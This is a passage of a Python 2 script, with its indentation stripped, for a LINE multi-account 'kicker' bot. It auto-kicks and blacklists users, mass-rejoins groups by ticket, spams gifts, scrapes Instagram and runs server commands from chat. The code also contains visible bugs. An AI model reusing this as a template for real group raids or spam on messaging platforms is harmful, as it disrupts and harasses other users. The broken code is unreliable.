print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kd.getGroup(op.param1)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ticket = kd.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
kf.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ke.getGroup(op.param1)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ticket = ke.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#========================================================================
if Fmid in op.param3:
if op.param2 in Bots and admin:
pass
try:
kg.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kg.getGroup(op.param1)
X.preventJoinByTicket = False
kg.updateGroup(X)
Ti = kg.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kf.getGroup(op.param1)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ticket = kf.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Gmid in op.param3:
if op.param2 in Bots:
pass
try:
kh.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kh.getGroup(op.param1)
X.preventJoinByTicket = False
kh.updateGroup(X)
Ti = kh.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kg.getGroup(op.param1)
X.preventJoinByTicket = True
kg.updateGroup(X)
Ticket = kg.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Hmid in op.param3:
if op.param2 in Bots:
pass
try:
kj.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kj.getGroup(op.param1)
X.preventJoinByTicket = False
kj.updateGroup(X)
Ti = kj.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kh.getGroup(op.param1)
X.preventJoinByTicket = True
kh.updateGroup(X)
Ticket = kh.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Jmid in op.param3:
if op.param2 in Bots:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client が蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nBecause the client does not exist in the kick regulation or group.\nAdd it to the blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ti = cl.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kj.getGroup(op.param1)
X.preventJoinByTicket = True
kj.updateGroup(X)
Ticket = kj.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Nmid in op.param3:
if op.param2 in Bots:
pass
try:
ko.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ko.getGroup(op.param1)
G.preventJoinByTicket = False
ko.updateGroup(G)
Ti = ko.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
kd.acceptGroupInvitationByTicket(op.param1,Ti)
ke.acceptGroupInvitationByTicket(op.param1,Ti)
kf.acceptGroupInvitationByTicket(op.param1,Ti)
kg.acceptGroupInvitationByTicket(op.param1,Ti)
kh.acceptGroupInvitationByTicket(op.param1,Ti)
kn.acceptGroupInvitationByTicket(op.param1,Ti)
ko.acceptGroupInvitationByTicket(op.param1,Ti)
kp.acceptGroupInvitationByTicket(op.param1,Ti)
kq.acceptGroupInvitationByTicket(op.param1,Ti)
kr.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kn.getGroup(op.param1)
X.preventJoinByTicket = True
kn.updateGroup(X)
Ti = kn.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
#============================================================================
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 25:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == admin:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
ki.like(url[25:58], url[66:], likeType=1001)
kk.like(url[25:58], url[66:], likeType=1001)
kc.like(url[25:58], url[66:], likeType=1001)
kt.like(url[25:58], url[66:], likeType=1001)
ks.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
cl.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
cl.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"Deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
cl.sendText(msg.to,"already in the blacklist")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
cl.sendText(msg.to,"successfully load users into the blacklist")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
cl.sendText(msg.to,"successfully removed from the blacklist")
wait["dblacklist"] = False
else:
wait["dblacklist"] = False
cl.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + msg.contentMetadata["displayName"] + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Message :\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"⎈ Profile Name :\n" + contact.displayName + "\n\n⎈ Mid :\n" + msg.contentMetadata["mid"] + "\n\n⎈ Status Mesage:\n" + contact.statusMessage + "\n\n⎈ Pict Status :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\n⎈ Cover Status :\n" + str(cu) + "\n\n [☸]➦Powered By: メTamii々•┅─────")
elif msg.contentType == 16:
if wait["contact"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Help","help"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, helpMessage + datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Textspeech","textspeech","TextSpeech"]:
if msg.from_ in admin:
print "\nHelp pick up..."
if wait["lang"] == "JP":
cl.sendText(msg.to, textspeech + datetime.today().strftime('%H:%M:%S'))
elif ("Group name:" in msg.text):
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Group name:","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["winvite"] == True:
if msg.from_ in admin:
_name = msg.contentMetadata["displayName"]
invite = msg.contentMetadata["mid"]
groups = cl.getGroup(msg.to)
pending = groups.invitee
targets = []
for s in groups.members:
if _name in s.displayName:
cl.sendText(msg.to,"-> " + _name + " was here")
break
elif invite in wait["blacklist"]:
ki.sendText(msg.to,"Sorry, " + _name + " On Blacklist")
ki.sendText(msg.to,"Call my owner to use command !, \n➡Unban: " + invite)
break
else:
targets.append(invite)
if targets == []:
pass
else:
for target in targets:
try:
cl.findAndAddContactsByMid(target)
cl.inviteIntoGroup(msg.to,[target])
cl.sendText(msg.to,"Done Invite : \n➡" + _name)
wait["winvite"] = False
break
except:
try:
ki.findAndAddContactsByMid(invite)
ki.inviteIntoGroup(op.param1,[invite])
wait["winvite"] = False
except:
cl.sendText(msg.to,"Negative, Error detected")
wait["winvite"] = False
break
elif "Invite:" in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Invite:"," ")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif msg.text.lower() == 'all bot':
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
kk.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
kc.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ks.sendMessage(msg)
msg.contentType = 13
msg.contentMetadata = {'mid': Emid}
kt.sendMessage(msg)
#=======================================================
elif msg.text in ["Me"]:
if msg.from_ in admin:
msg.contentType = 13
cl.sendText(msg.to,"add bossque")
msg.contentMetadata = {'mid': msg.from_}
cl.sendMessage(msg)
elif msg.text.lower() == 'gift1':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '1'}
msg.text = None
cl.sendMessage(msg)
elif msg.text.lower() == 'gift2':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '2'}
msg.text = None
ki.sendMessage(msg)
elif msg.text.lower() == 'gift3':
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '3'}
msg.text = None
kk.sendMessage(msg)
elif msg.text.lower() == 'gift4':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '4'}
msg.text = None
kc.sendMessage(msg)
elif msg.text.lower() == 'gift5':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '5'}
msg.text = None
kd.sendMessage(msg)
elif msg.text.lower() == 'gift6':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}
msg.text = None
ke.sendMessage(msg)
elif msg.text.lower() == 'spam gift':
if msg.from_ in admin:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '12'}
msg.text = None
ki.sendMessage(msg)
kk.sendMessage(msg)
kc.sendMessage(msg)
cl.sendMessage(msg)
ks.sendMessage(msg)
kt.sendMessage(msg)
kt.sendMessage(msg)
elif "Gift @" in msg.text:
_name = msg.text.replace("Gift @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
msg.contentType = 9
msg.contentMetadata={'PRDID': '89131c1a-e549-4bd5-9e60-e24de0d2e252',
'PRDTYPE': 'THEME', 'MSGTPL': '10'}
msg.text = None
cl.dendMessage(msg,g)
#==================================================
elif "All rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("All rename:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif msg.text.lower() == 'allbio:':
if msg.from_ in owner:
string = msg.text.lower().replace("allbio:","")
if len(string.decode('utf-8')) <= 500:
profile = ki.getProfile()
profile.statusMessage = string
ki.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kk.getProfile()
profile.statusMessage = string
kk.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kc.getProfile()
profile.statusMessage = string
kc.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = ks.getProfile()
profile.statusMessage = string
ks.updateProfile(profile)
if len(string.decode('utf-8')) <= 500:
profile = kt.getProfile()
profile.statusMessage = string
kt.updateProfile(profile)
cl.sendText(msg.to,"successfully turn it into: " + string + "")
elif "My name:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("My name:","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot2 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot2 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot3 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot3 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kc.getProfile()
profile.displayName = string
kc.updateProfile(profile)
kc.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot4 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot4 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kk.getProfile()
profile.displayName = string
kk.updateProfile(profile)
kk.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot5 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot5 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = ks.getProfile()
profile.displayName = string
ks.updateProfile(profile)
ks.sendText(msg.to,"change name: "+string+"\nsucces")
elif "Bot6 rename:" in msg.text:
if msg.from_ in owner:
string = msg.text.replace("Bot6 rename:","")
if len(string.decode('utf-8')) <= 20:
profile = kt.getProfile()
profile.displayName = string
kt.updateProfile(profile)
kt.sendText(msg.to,"change name: "+string+"\nsucces")
#==================================================
elif 'lyric ' in msg.text.lower():
if msg.from_ in admin:
try:
songname = msg.text.lower().replace('lyric ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'Lyric Lagu ('
hasil += song[0]
hasil += ')\n\n'
hasil += song[5]
cl.sendText(msg.to, hasil)
except Exception as wak:
cl.sendText(msg.to, str(wak))
elif 'wiki ' in msg.text.lower():
if msg.from_ in admin:
try:
wiki = msg.text.lower().replace("wiki ","")
wikipedia.set_lang("id")
pesan="Title ("
pesan+=wikipedia.page(wiki).title
pesan+=")\n\n"
pesan+=wikipedia.summary(wiki, sentences=1)
pesan+="\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except:
try:
pesan="Over Text Limit! Please Click link\n"
pesan+=wikipedia.page(wiki).url
cl.sendText(msg.to, pesan)
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'bot restart':
if msg.from_ in admin:
print "[Command]Like executed"
try:
cl.sendText(msg.to,"Restarting...")
restart_program()
except:
cl.sendText(msg.to,"Please wait")
restart_program()
pass
elif msg.text.lower() == 'ifconfig':
if msg.from_ in admin:
botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===")
elif msg.text.lower() == 'system':
if msg.from_ in admin:
botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
if msg.from_ in admin:
botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
if msg.from_ in admin:
botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text.lower() == 'runtime':
if msg.from_ in admin:
eltime = time.time()
van = "Bot has been running for "+waktu(eltime)
cl.sendText(msg.to,van)
elif 'music ' in msg.text.lower():
try:
songname = msg.text.lower().replace('music ','')
params = {'songname': songname}
r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params))
data = r.text
data = json.loads(data)
for song in data:
hasil = 'This is Your Music\n'
hasil += 'Judul : ' + song[0]
hasil += '\nDurasi : ' + song[1]
hasil += '\nLink Download : ' + song[4]
cl.sendText(msg.to, hasil)
cl.sendText(msg.to, "Please Wait for audio...")
cl.sendAudioWithURL(msg.to, song[4])
except Exception as njer:
cl.sendText(msg.to, str(njer))
#elif 'instagram ' in msg.text.lower():
# try:
# instagram = msg.text.lower().replace("instagram ","")
# html = requests.get('https://www.instagram.com/' + instagram + '/?')
# soup = BeautifulSoup(html.text, 'html5lib')
# data = soup.find_all('meta', attrs={'property':'og:description'})
# text = data[0].get('content').split()
# data1 = soup.find_all('meta', attrs={'property':'og:image'})
# text1 = data1[0].get('content').split()
# user = "Name: " + text[-2] + "\n"
# user1 = "Username: " + text[-1] + "\n"
# followers = "Followers: " + text[0] + "\n"
# following = "Following: " + text[2] + "\n"
# post = "Post: " + text[4] + "\n"
# link = "Link: " + "https://www.instagram.com/" + instagram
# detail = "========INSTAGRAM INFO USER========\n"
# details = "\n========INSTAGRAM INFO USER========"
# cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details)
# cl.sendImageWithURL(msg.to, text1[0])
# cl.sendText("Follow yak Fast Follback ")
# except Exception as njer:
# cl.sendText(msg.to, str(njer))
elif 'instagram ' in msg.text.lower():
try:
instagram = msg.text.replace("instagram ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['user']['full_name'])
bioIG = str(data['user']['biography'])
mediaIG = str(data['user']['media']['count'])
verifIG = str(data['user']['is_verified'])
usernameIG = str(data['user']['username'])
followerIG = str(data['user']['followed_by']['count'])
profileIG = data['user']['profile_pic_url_hd']
privateIG = str(data['user']['is_private'])
followIG = str(data['user']['follows']['count'])
link = "Link: " + "https://www.instagram.com/" + instagram
detail = "========INSTAGRAM INFO USER========\n"
details = "\n========INSTAGRAM INFO USER========"
text = detail + "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollower : "+followerIG+"\nFollowing : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link + details
cl.sendImageWithURL(msg.to, profileIG)
cl.sendText(msg.to, str(text))
except Exception as e:
cl.sendText(msg.to, str(e))
cl.sendText(msg.to,"Follow Fast Follback")
elif "Image " in msg.text:
search = msg.text.replace("Image ","")
url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
print path
try:
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Id@en" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'en'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"════FROM ID════\n" + "" + kata + "\n════TO ENGLISH════\n" + "" + result + "\n══════SUKSES═════")
elif 'clean invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
X = cl.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
random.choice(KAC).cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"No one is inviting。")
else:
cl.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can not be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
